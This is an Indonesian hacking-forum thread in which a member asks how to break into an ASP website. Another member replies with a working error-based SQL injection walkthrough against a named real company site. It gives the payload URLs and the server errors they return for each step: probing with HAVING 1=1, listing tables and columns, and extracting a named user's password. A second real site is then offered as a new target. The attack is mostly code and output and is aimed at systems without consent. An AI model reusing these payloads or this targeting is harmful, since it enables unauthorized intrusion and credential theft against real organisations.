[ASK]Hacking Website ASP
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
[ASK]Hacking Website ASP
Aku pengen nanya nih, lagi pengen ngehack website yang menggunakan ASP..
udah ngecek di google katanya harus cek vulnerability website nya, bisa di pakein SQLi atau ngga.. dan udah aku cek dan ternyata ngga bisa..
ada saran dari senior2 ngga harus gimana cara hack nya ? :kaca:
udah ngecek di google katanya harus cek vulnerability website nya, bisa di pakein SQLi atau ngga.. dan udah aku cek dan ternyata ngga bisa..
ada saran dari senior2 ngga harus gimana cara hack nya ? :kaca:
♠ Love and magic have a great deal in common. They enrich the soul, delight the heart. And they both take practice. ♠
Re: [ASK]Hacking Website ASP
*bump*
sorry nyundul :maaf:
sorry nyundul :maaf:
♠ Love and magic have a great deal in common. They enrich the soul, delight the heart. And they both take practice. ♠
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: [ASK]Hacking Website ASP
memang beda sih bos,cara ngeceknya dengan pake --> having 1=1
............make a wish............
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [ASK]Hacking Website ASP
Bisa baca2 di sini :xMikael wrote:Aku pengen nanya nih, lagi pengen ngehack website yang menggunakan ASP..
http://lllg4pt3klll.wordpress.com/2009/ ... ction-asp/
Skalian dibahas PoC SQLi site http://www.plnbali.co.idshinichi81 wrote:memang beda sih bos,cara ngeceknya dengan pake --> having 1=1
Biar teman2 bisa belajar dari master shinichi81
...n0 l1m17...
Re: [ASK]Hacking Website ASP
aneh nih bro.. saya coba di website ini ngga muncul pesan error atau semacamnya.. kalau test di web lain muncul error.. padahal sama2 .asp
bingung nih --a :putusasa:
bingung nih --a :putusasa:
♠ Love and magic have a great deal in common. They enrich the soul, delight the heart. And they both take practice. ♠
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: [ASK]Hacking Website ASP
Sy beri cuplikannya dikit deh :
1. Cek vuln apa gak
Hasil Error:
2. Cari nama tabel
Hasil Error:
Hasil Error:
3. Mencari nama kolom pada tabel dtproperties
Hasil Error:
Hasil Error:
4. Melihat isi kolom:
Hasil Error:
1. Cek vuln apa gak
Code: Select all
http://www.plnbali.co.id/dari_Media.asp?id=795+having+1=1--
Terdeteksi ada Tabel bernama media dan salah satu kolomnya bernama IDMicrosoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'media.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/dari_Media.asp, line 7
2. Cari nama tabel
Code: Select all
http://www.plnbali.co.id/dari_Media.asp?id=795+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
Tabel berikutnya:[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Inkaso' to a column of data type int.
Code: Select all
http://www.plnbali.co.id/dari_Media.asp?id=795+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(%27Inkaso%27)))--
Silahkan dilanjutkan...[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'dtproperties' to a column of data type int.
3. Mencari nama kolom pada tabel dtproperties
Code: Select all
http://www.plnbali.co.id/dari_Media.asp?id=795+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name=%27dtproperties%27))--
Kolom berikutnya:[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'id' to a column of data type int.
Code: Select all
http://www.plnbali.co.id/dari_Media.asp?id=795+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name=%27dtproperties%27+and+column_name+not+in+(%27id%27)))--
Silahkan dilanjutkan...[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'objectid' to a column of data type int.
4. Melihat isi kolom:
Code: Select all
http://www.plnbali.co.id/dari_Media.asp?id=795+and+1=convert(int,(select+top+1+pass+from+loguser+where+username=%27tagor%27))--
NB: Ini hanya untuk tujuan edukasi saja, baik dari rekan2 XCoder maupun Pengelola Website...[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '[SENSOR]' to a column of data type int.
...n0 l1m17...
Re: [ASK]Hacking Website ASP
tapi kalau website target nya ngga vuln gimana ya bro ?
jadi seperti contoh yang tadi bro nya kasi..
semestinya kan muncul error seperti ini pada saat having 1=1--, tapi kalau tidak muncul gimana ya ? tidak ada perubahan sama website nya..
btw thx untuk tutorial yang ini..
jadi seperti contoh yang tadi bro nya kasi..
Code: Select all
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'media.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/dari_Media.asp, line 7
btw thx untuk tutorial yang ini..
♠ Love and magic have a great deal in common. They enrich the soul, delight the heart. And they both take practice. ♠
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: [ASK]Hacking Website ASP
xMikael wrote:aneh nih bro.. saya coba di website ini ngga muncul pesan error atau semacamnya.. kalau test di web lain muncul error.. padahal sama2 .asp
bingung nih --a :putusasa:
Mendingan script-nya di liatin disini aja bro,supaya bisa kelihatan masalahnya
............make a wish............
Re: [ASK]Hacking Website ASP
hmm coba kesini deh bro..
http://ourbalischools.com/tamanrama.default.asp
http://ourbalischools.com/tamanrama.default.asp
♠ Love and magic have a great deal in common. They enrich the soul, delight the heart. And they both take practice. ♠
- andryh4ever
- Posts: 181
- Joined: Tue Dec 15, 2009 3:08 pm
- Location: Kendawangan, Kab. Ketapang, Kalimantan Barat
- Contact:
Re: [ASK]Hacking Website ASP
Kalo ga ada eror bukanya ga ada vuln ya? M'f kalo salah cuma asal bicara :maaf:
Let's Join with us on http://www.borneocrew.org/
..::: Hanya Ing!n Menul!$ Apa Yang Ing!n Aku Tul!s :::..
[*] Visit me on http://pl4nkt0n767.blogspot.com [*]
[*] Visit me on http://spyc0dz.blogspot.com [*]